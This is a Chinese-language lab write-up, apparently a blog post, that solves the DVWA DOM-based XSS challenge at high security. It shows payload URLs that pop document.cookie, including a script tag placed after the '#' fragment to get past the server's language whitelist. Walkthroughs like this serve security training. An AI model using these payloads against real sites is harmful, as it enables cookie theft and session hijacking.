DVWA - XSS DOM (high)

随便选择一个。url中会出现我们选的哪个
在这里插入图片描述

http://127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(document.cookie)%3C/script%3E

在这里插入图片描述
应该与medium级别一样,过滤了script标签

试试 <img src=1 onerror=alert(document.cookie)>

http://127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=%3Cimg%20src=1%20onerror=alert(document.cookie)%3E

在这里插入图片描述再换一种方法
URL的锚(#符号之后的任何内容)不会发送到服务器,因此无法被阻止

http://127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=English#%3Cscript%3Ealert(document.cookie)%3C/script%3E

在这里插入图片描述
成功执行

代码分析

在这里插入图片描述
可以看出,服务器端代码先判断defalut值是否为空,如果不为空的话,再用switch语句进行匹配,如果匹配成功,则插入case字段的相应值,如果不匹配,则插入的是默认的值。白名单只允许传的 default值 为 French English German Spanish 其中一个。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值